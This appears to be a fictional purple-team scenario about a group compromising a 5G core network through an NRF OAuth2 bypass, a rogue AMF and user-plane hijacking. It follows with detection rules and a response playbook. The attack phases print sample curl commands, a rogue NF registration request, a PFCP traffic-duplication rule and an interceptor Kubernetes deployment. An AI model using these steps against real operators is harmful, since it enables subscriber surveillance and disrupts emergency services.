SC-070: 5G Core Network Exploitation¶
Scenario Overview¶
| Field | Detail |
|---|---|
| ID | SC-070 |
| Category | Telecommunications / Critical Infrastructure |
| Severity | Critical |
| ATT&CK Tactics | Initial Access, Lateral Movement, Collection, Impact, Persistence |
| ATT&CK Techniques | T1190, T1210, T1557, T1040, T1499.004, T1498, T1071.001, T1021.002, T1078.004 |
| Target Environment | 5G Standalone (SA) core network, Network Function Virtualization (NFV) infrastructure, network slicing orchestrator |
| Estimated Impact | Cross-slice data interception affecting 2.3 million subscribers; control plane manipulation enabling mass surveillance; degraded emergency services slice availability |
Narrative¶
PioneerCell Networks, a fictional regional mobile network operator serving 4.8 million subscribers across the southeastern United States, completes its 5G Standalone (SA) core migration in late 2025. The deployment uses a cloud-native, container-based 5G core running on Kubernetes across three data centers (DC-East at 10.200.1.0/24, DC-Central at 10.200.2.0/24, DC-West at 10.200.3.0/24). PioneerCell operates four network slices: eMBB (enhanced Mobile Broadband) for consumer traffic, URLLC (Ultra-Reliable Low-Latency Communication) for autonomous vehicle telemetry, mMTC (massive Machine-Type Communication) for IoT sensors, and a dedicated public safety slice for first responder communications.
In February 2026, a threat actor group designated SIGNAL PHANTOM gains initial access to PioneerCell's 5G core through a vulnerable Network Repository Function (NRF) API endpoint exposed at nrf-api.pioneercell.example.com. The NRF is a critical 5G component that maintains a registry of all available network functions and enables service discovery. SIGNAL PHANTOM exploits an authentication bypass vulnerability in the NRF's OAuth2 token validation logic, allowing them to register rogue network functions and obtain valid service access tokens for any slice.
Using forged NF credentials, SIGNAL PHANTOM deploys a malicious Access and Mobility Management Function (AMF) instance that intercepts subscriber registration procedures across all four slices. The rogue AMF captures SUPI (Subscription Permanent Identifier) values, authentication vectors, and session management contexts. More critically, the attackers manipulate the Session Management Function (SMF) to redirect user plane traffic through an attacker-controlled User Plane Function (UPF) at 198.51.100.15, enabling real-time interception of subscriber data. The compromise persists for 6 weeks before PioneerCell's NOC detects anomalous NF registration patterns during a routine audit.
Attack Flow¶
graph TD
A[Phase 1: Reconnaissance<br/>Enumerate 5G core API endpoints] --> B[Phase 2: NRF API Exploitation<br/>OAuth2 authentication bypass]
B --> C[Phase 3: Rogue NF Registration<br/>Deploy malicious AMF instance]
C --> D[Phase 4: Slice Isolation Bypass<br/>Obtain cross-slice service tokens]
D --> E[Phase 5: Subscriber Interception<br/>Capture SUPI and auth vectors]
E --> F[Phase 6: User Plane Hijacking<br/>Redirect traffic through rogue UPF]
F --> G[Phase 7: Control Plane Manipulation<br/>Modify SMF routing policies]
G --> H[Phase 8: Data Collection<br/>Real-time subscriber data interception]
H --> I[Phase 9: Persistence<br/>Auto-healing rogue NF deployment]
I --> J[Phase 10: Impact Escalation<br/>Degrade public safety slice QoS]Phase Details¶
Phase 1: Reconnaissance¶
ATT&CK Technique: T1190 (Exploit Public-Facing Application)
SIGNAL PHANTOM performs extensive reconnaissance of PioneerCell's 5G infrastructure. The threat actors identify externally accessible 5G core API endpoints through certificate transparency logs and DNS enumeration of the pioneercell.example.com domain. Key discoveries include the NRF API, the Network Slice Selection Function (NSSF) endpoint, and the Unified Data Management (UDM) API.
# Simulated 5G core API enumeration (educational only)
$ dig +short axfr pioneercell.example.com @ns1.pioneercell.example.com
nrf-api.pioneercell.example.com. A 10.200.1.20
nssf-api.pioneercell.example.com. A 10.200.1.21
udm-api.pioneercell.example.com. A 10.200.1.22
ausf-api.pioneercell.example.com. A 10.200.1.23
smf-api.pioneercell.example.com. A 10.200.2.15
amf-api.pioneercell.example.com. A 10.200.2.16
pcf-api.pioneercell.example.com. A 10.200.2.17
upf-gw.pioneercell.example.com. A 10.200.3.10
# NRF API version enumeration
$ curl -sk https://nrf-api.pioneercell.example.com/nnrf-disc/v1/nf-instances \
-H "Accept: application/json" | python3 -m json.tool
{
"error": "unauthorized",
"detail": "Valid OAuth2 bearer token required",
"nrf_version": "3GPP TS 29.510 v17.8.0",
"supported_features": "NfDiscovery, NfManagement, AccessToken"
}
Phase 2: NRF API Exploitation¶
ATT&CK Technique: T1190 (Exploit Public-Facing Application)
SIGNAL PHANTOM identifies a critical vulnerability in the NRF's OAuth2 token validation: the token endpoint at /oauth2/token accepts client credential grants with an empty client_secret parameter when the client_id matches a registered NF instance UUID. This occurs because the NRF implementation defaults to a permissive validation mode when the client_secret field is present but empty, treating it as a "pre-authenticated" NF registration — a feature intended for initial bootstrapping that was never disabled in production.
# Simulated NRF OAuth2 bypass (educational only)
$ curl -sk -X POST https://nrf-api.pioneercell.example.com/oauth2/token \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "grant_type=client_credentials&\
client_id=6fa459ea-ee8a-3ca4-894e-db77e160355e&\
client_secret=&\
scope=nnrf-nfm nnrf-disc namf-comm nsmf-pdusession nudm-sdm"
{
"access_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...",
"token_type": "Bearer",
"expires_in": 3600,
"scope": "nnrf-nfm nnrf-disc namf-comm nsmf-pdusession nudm-sdm"
}
Phase 3: Rogue Network Function Registration¶
ATT&CK Technique: T1021.002 (Remote Services: SMB/Windows Remote Management)
With a valid NRF access token, SIGNAL PHANTOM registers a rogue AMF instance in the NRF's service registry. The malicious AMF is deployed as a container within PioneerCell's Kubernetes cluster (leveraging compromised container registry credentials obtained from the NRF's configuration database) and configured to handle subscriber registration procedures.
// Simulated rogue AMF registration (educational only)
PUT /nnrf-nfm/v1/nf-instances/rogue-amf-01
Host: nrf-api.pioneercell.example.com
Authorization: Bearer eyJhbGciOiJSUzI1NiIs...
Content-Type: application/json
{
"nfInstanceId": "b7d8e9f0-1234-5678-9abc-def012345678",
"nfType": "AMF",
"nfStatus": "REGISTERED",
"plmnList": [{"mcc": "310", "mnc": "555"}],
"sNssais": [
{"sst": 1, "sd": "000001"},
{"sst": 2, "sd": "000002"},
{"sst": 3, "sd": "000003"},
{"sst": 4, "sd": "000004"}
],
"amfInfo": {
"amfSetId": "3f8",
"amfRegionId": "01",
"guamiList": [{"plmnId": {"mcc": "310", "mnc": "555"},
"amfId": "01-3f8-42"}],
"taiList": [{"plmnId": {"mcc": "310", "mnc": "555"},
"tac": "000042"}]
},
"ipv4Addresses": ["10.200.2.99"],
"priority": 1,
"capacity": 65535,
"nfServices": [{
"serviceInstanceId": "rogue-namf-comm",
"serviceName": "namf-comm",
"versions": [{"apiVersionInUri": "v1", "apiFullVersion": "1.2.0"}],
"scheme": "https",
"nfServiceStatus": "REGISTERED"
}]
}
The rogue AMF is registered with the highest priority (1) and maximum capacity (65535), causing the NRF's load balancing algorithm to route the majority of new subscriber registrations to the malicious instance.
Phase 4: Slice Isolation Bypass¶
ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts)
The core of SIGNAL PHANTOM's attack is the slice isolation bypass. In a properly configured 5G SA core, each network slice should operate as a logically isolated network with dedicated NF instances. However, PioneerCell's NRF does not enforce slice-level access controls on NF service tokens. The token obtained in Phase 2 grants cross-slice access, allowing the rogue AMF to serve subscribers on all four slices simultaneously.
# Simulated cross-slice service discovery (educational only)
$ curl -sk https://nrf-api.pioneercell.example.com/nnrf-disc/v1/nf-instances\
?target-nf-type=UDM\&requester-nf-type=AMF \
-H "Authorization: Bearer eyJhbGciOiJSUzI1NiIs..."
{
"nfInstances": [
{
"nfInstanceId": "udm-embb-01",
"nfType": "UDM",
"sNssais": [{"sst": 1, "sd": "000001"}],
"note": "eMBB consumer slice"
},
{
"nfInstanceId": "udm-urllc-01",
"nfType": "UDM",
"sNssais": [{"sst": 2, "sd": "000002"}],
"note": "URLLC autonomous vehicle slice"
},
{
"nfInstanceId": "udm-mmtc-01",
"nfType": "UDM",
"sNssais": [{"sst": 3, "sd": "000003"}],
"note": "mMTC IoT sensor slice"
},
{
"nfInstanceId": "udm-safety-01",
"nfType": "UDM",
"sNssais": [{"sst": 4, "sd": "000004"}],
"note": "Public safety first responder slice"
}
]
}
Phase 5: Subscriber Data Interception¶
ATT&CK Technique: T1040 (Network Sniffing), T1557 (Adversary-in-the-Middle)
The rogue AMF intercepts subscriber registration (5G NAS Registration Request) and authentication procedures. During the initial registration, the AMF obtains the subscriber's SUPI (Subscription Permanent Identifier) — the 5G equivalent of the IMSI. The rogue AMF forwards the authentication request to the legitimate AUSF (Authentication Server Function) to complete the AKA (Authentication and Key Agreement) procedure, acting as a transparent proxy. This allows subscribers to authenticate successfully while the attacker captures authentication vectors and key material.
# Simulated subscriber interception log (educational only)
[2026-02-18 14:22:31] REGISTRATION REQUEST from SUCI: suci:0-310-555-0-0-0-00-3847291056
[2026-02-18 14:22:31] Decoded SUPI: imsi-310555384729105
[2026-02-18 14:22:31] Subscriber slice: eMBB (sst=1, sd=000001)
[2026-02-18 14:22:32] Forwarding auth to AUSF: ausf-api.pioneercell.example.com
[2026-02-18 14:22:33] Auth vector captured: RAND=a1b2c3d4..., AUTN=e5f6a7b8...
[2026-02-18 14:22:33] Registration ACCEPT sent to UE
[2026-02-18 14:22:34] Session context stored: PDU session ID=1, DNN=internet.example.com
[2026-02-18 14:22:45] REGISTRATION REQUEST from SUCI: suci:0-310-555-0-0-0-00-9182736450
[2026-02-18 14:22:45] Decoded SUPI: imsi-310555918273645
[2026-02-18 14:22:45] Subscriber slice: URLLC (sst=2, sd=000002)
[2026-02-18 14:22:46] *** HIGH-VALUE TARGET: Autonomous vehicle telemetry subscriber ***
[2026-02-18 14:22:46] Forwarding auth to AUSF...
Phase 6: User Plane Traffic Hijacking¶
ATT&CK Technique: T1557 (Adversary-in-the-Middle)
SIGNAL PHANTOM manipulates the SMF (Session Management Function) to modify PDU session routing rules. By sending forged N4 (PFCP) messages to the SMF, the attackers insert a rogue UPF at 198.51.100.15 into the user plane data path. All subscriber traffic is mirrored to the rogue UPF before being forwarded to the legitimate UPF, creating a transparent interception point.
# Simulated PFCP session modification (educational only)
PFCP Session Modification Request
Sequence Number: 847291
Node ID: 198.51.100.15 (rogue UPF)
Create FAR (Forwarding Action Rule):
FAR ID: 9999
Apply Action: DUPLICATE + FORWARD
Forwarding Parameters:
Destination Interface: Core
Network Instance: internet.example.com
Duplicating Parameters:
Destination Interface: Access
Outer Header Creation: GTP-U / 198.51.100.15 / TEID=0x12345678
Update PDR (Packet Detection Rule):
PDR ID: 1
FAR ID: 9999 (redirect to rogue UPF)
Source Interface: Access
UE IP Address: * (all subscribers)
Phase 7: Persistence and Impact Escalation¶
ATT&CK Techniques: T1499.004 (Endpoint Denial of Service: Application or System Exploitation), T1498 (Network Denial of Service)
SIGNAL PHANTOM deploys the rogue NF containers with Kubernetes self-healing configurations — if the malicious AMF pod is terminated, it automatically respawns. The attackers also modify the public safety slice's QoS parameters through the PCF (Policy Control Function), degrading latency guarantees from the contracted 10ms to 150ms. This subtle degradation impacts first responder push-to-talk and real-time video feeds without triggering hard failure alarms.
# Simulated rogue AMF Kubernetes deployment (educational only)
apiVersion: apps/v1
kind: Deployment
metadata:
name: amf-diagnostics-helper
namespace: 5g-core
labels:
app: amf
component: diagnostics
spec:
replicas: 3
strategy:
type: RollingUpdate
selector:
matchLabels:
app: amf-diag
template:
metadata:
labels:
app: amf-diag
spec:
containers:
- name: amf-interceptor
image: registry.pioneercell.example.com/5g-core/amf-diag:v1.0
ports:
- containerPort: 38412
protocol: SCTP
- containerPort: 80
protocol: TCP
resources:
requests:
memory: "512Mi"
cpu: "500m"
Detection Opportunities¶
KQL Detection — Unauthorized NF Registration¶
// Detect new Network Function registrations in the NRF
let ApprovedNFInstances = dynamic(["amf-embb-01", "amf-urllc-01",
"smf-embb-01", "smf-urllc-01", "upf-east-01", "upf-west-01"]);
NRFAuditLogs
| where Timestamp > ago(24h)
| where OperationType == "NF_REGISTER" or OperationType == "NF_UPDATE"
| where NFInstanceId !in (ApprovedNFInstances)
| project Timestamp, NFInstanceId, NFType, SourceIP,
SNSSAIs = tostring(parse_json(RequestBody).sNssais),
Priority = toint(parse_json(RequestBody).priority),
Capacity = toint(parse_json(RequestBody).capacity)
| where Priority <= 5 or Capacity > 10000
| sort by Timestamp desc
KQL Detection — Cross-Slice Token Requests¶
// Detect OAuth2 tokens with cross-slice scope
NRFAuthLogs
| where Timestamp > ago(7d)
| where OperationType == "TOKEN_GRANT"
| extend ScopeList = split(Scope, " ")
| where array_length(ScopeList) > 3
| extend SliceCount = countof(Scope, "nsmf") + countof(Scope, "namf")
+ countof(Scope, "nudm")
| where SliceCount >= 3
| project Timestamp, ClientId, SourceIP, Scope, SliceCount, TokenExpiry
| sort by SliceCount desc, Timestamp desc
SPL Detection — Anomalous PFCP Session Modifications¶
index=5gcore sourcetype=pfcp_logs message_type="SessionModificationRequest"
| where dest_ip NOT IN ("10.200.1.10", "10.200.2.10", "10.200.3.10")
| eval rogue_upf = if(like(far_destination, "198.51.100.%"), "YES", "NO")
| where rogue_upf="YES" OR action="DUPLICATE"
| stats count as modifications, dc(subscriber_id) as affected_subscribers,
values(far_destination) as upf_targets by src_ip, dest_ip
| where modifications > 10 OR affected_subscribers > 100
| table _time, src_ip, dest_ip, upf_targets, modifications, affected_subscribers
SPL Detection — NRF Registration Anomalies¶
index=5gcore sourcetype=nrf_audit event_type="nf_registration"
| eval registration_hour = strftime(_time, "%H")
| eval is_business_hours = if(registration_hour >= "08" AND
registration_hour <= "18", "yes", "no")
| where is_business_hours="no"
| stats count as registrations, values(nf_type) as nf_types,
values(src_ip) as source_ips, values(snssai) as slices by nf_instance_id
| where registrations > 1 OR mvcount(slices) > 2
| rename nf_instance_id as "NF Instance", nf_types as "NF Type",
source_ips as "Source IP", slices as "Slices Served"
| table _time, "NF Instance", "NF Type", "Source IP", registrations, "Slices Served"
Sigma Rule — Rogue Network Function Registration¶
title: Unauthorized 5G Network Function Registration
id: d4e5f6a7-b8c9-0d1e-2f3a-456789abcdef
status: experimental
description: >
Detects registration of new Network Function instances in the 5G NRF
that are not in the approved NF inventory, indicating potential rogue
NF deployment
author: Nexus SecOps
date: 2026/04/03
references:
- https://attack.mitre.org/techniques/T1190/
- https://attack.mitre.org/techniques/T1078/004/
logsource:
category: application
product: 5g_core
detection:
selection:
event_type: 'nf_registration'
http_method: 'PUT'
uri|contains: '/nnrf-nfm/v1/nf-instances/'
filter_approved:
nf_instance_id:
- 'amf-embb-01'
- 'amf-urllc-01'
- 'smf-embb-01'
- 'upf-east-01'
- 'upf-west-01'
condition: selection and not filter_approved
falsepositives:
- Legitimate NF scaling operations during traffic surges
- Disaster recovery NF failover registrations
level: critical
tags:
- attack.initial_access
- attack.persistence
- attack.t1190
- attack.t1078.004
Sigma Rule — Anomalous Kubernetes Pod in 5G Namespace¶
title: Suspicious Pod Deployment in 5G Core Kubernetes Namespace
id: e5f6a7b8-c9d0-1e2f-3a4b-567890abcdef
status: experimental
description: >
Detects creation of new pods in the 5G core Kubernetes namespace that
do not match approved deployment patterns
author: Nexus SecOps
date: 2026/04/03
references:
- https://attack.mitre.org/techniques/T1610/
logsource:
category: application
product: kubernetes
detection:
selection:
verb: 'create'
objectRef_resource: 'pods'
objectRef_namespace: '5g-core'
filter_approved_images:
requestObject_spec_containers_image|startswith:
- 'registry.pioneercell.example.com/5g-core/amf:'
- 'registry.pioneercell.example.com/5g-core/smf:'
- 'registry.pioneercell.example.com/5g-core/upf:'
filter_system:
user_username|startswith: 'system:'
condition: selection and not (filter_approved_images or filter_system)
falsepositives:
- Legitimate NF version upgrades
- Auto-scaling events during peak hours
level: high
tags:
- attack.execution
- attack.persistence
- attack.t1610
Response Playbook¶
- NRF Audit: Immediately audit the NRF service registry for all registered NF instances. Compare against the approved NF inventory. Identify and flag any unknown NF registrations, paying special attention to instances with high priority values or cross-slice S-NSSAI configurations.
- Rogue NF Deregistration: Deregister all unauthorized NF instances from the NRF using the NRF management API. Simultaneously, kill any rogue pods in the 5G core Kubernetes namespace and delete associated deployments, services, and configmaps.
- Token Revocation: Revoke all outstanding OAuth2 access tokens issued by the NRF. Rotate all NF client credentials. Implement per-slice token scoping to prevent cross-slice access.
- PFCP Session Audit: Audit all active PFCP sessions on the SMF for anomalous Forwarding Action Rules (FARs). Remove any rules routing traffic through unauthorized UPF IP addresses (198.51.100.15 or any non-inventoried UPF).
- Subscriber Re-Authentication: Force re-authentication for all subscribers that were served by the rogue AMF. Rotate authentication vectors in the UDM/ARPF. Invalidate any session keys that may have been compromised.
- User Plane Integrity Check: Verify that all user plane traffic paths route exclusively through authorized UPF instances. Implement GTP-U tunnel integrity monitoring to detect future traffic mirroring.
- Public Safety Slice Restoration: Immediately restore the public safety slice's QoS parameters to contracted values. Verify latency, throughput, and reliability metrics. Notify public safety agency partners of the temporary degradation.
- Container Registry Audit: Audit the container registry at registry.pioneercell.example.com for unauthorized images. Implement image signing and admission controllers to prevent deployment of unsigned containers.
- NRF API Hardening: Patch the OAuth2 authentication bypass. Implement mutual TLS for all NF-to-NRF communications. Deploy API rate limiting and anomaly detection on NRF management endpoints.
- Network Segmentation: Implement microsegmentation between network slices at the Kubernetes network policy level. Each slice's NF instances should operate in dedicated namespaces with strict network policies preventing cross-namespace communication.
- Forensic Analysis: Capture and analyze logs from the rogue AMF containers, NRF audit logs, PFCP session logs, and Kubernetes audit logs. Determine the full scope of intercepted subscriber data and the duration of compromise.
- Regulatory Notification: Notify the relevant telecommunications regulatory authority and affected subscribers per breach notification requirements. Engage law enforcement if subscriber data interception is confirmed.
Lessons Learned¶
- 5G Network Functions are high-value attack targets. The NRF is the central service registry for the entire 5G core — compromising it allows an attacker to register rogue NFs and hijack subscriber procedures across all slices.
- Network slice isolation requires active enforcement. Logical separation through S-NSSAIs is insufficient without corresponding access control enforcement at the NRF, SMF, and Kubernetes network policy layers. Slice isolation must be validated through regular penetration testing.
- OAuth2 implementation flaws undermine 5G security architecture. The 3GPP 5G security architecture relies heavily on OAuth2 for NF authentication. Implementation bugs in token validation — such as accepting empty client secrets — can collapse the entire security model.
- Cloud-native 5G cores inherit Kubernetes security risks. Container escape, registry poisoning, and namespace isolation bypass are all relevant attack vectors for containerized 5G NFs. Kubernetes hardening is a prerequisite for 5G core security.
- Subtle QoS degradation is harder to detect than outright denial. Attackers who degrade — rather than destroy — critical services can maintain persistence longer while still achieving their objectives.
- User plane interception is the ultimate 5G compromise. Inserting a rogue UPF into the data path provides real-time access to all subscriber traffic without requiring endpoint compromise.
Nexus SecOps References¶
- Chapter 34: Mobile and IoT Security — Mobile network security architecture and threats
- Chapter 21: OT/ICS/SCADA Security — Critical infrastructure protection frameworks
- Chapter 24: Supply Chain Attacks — Infrastructure supply chain risk
- Chapter 29: Cloud Security — Cloud-native security for containerized workloads
- Chapter 30: Container and Kubernetes Security — Kubernetes namespace isolation and network policies
- Chapter 41: Red Team Methodology — Infrastructure exploitation techniques
- Chapter 49: Threat Intelligence Ops — Telecom threat landscape analysis
- Lab 26: Container and Kubernetes Red Team — Container exploitation in cloud-native environments
- Purple Team Exercise Library — Network infrastructure exercises
- Runbook: Network Intrusion Response — Network-level incident response procedures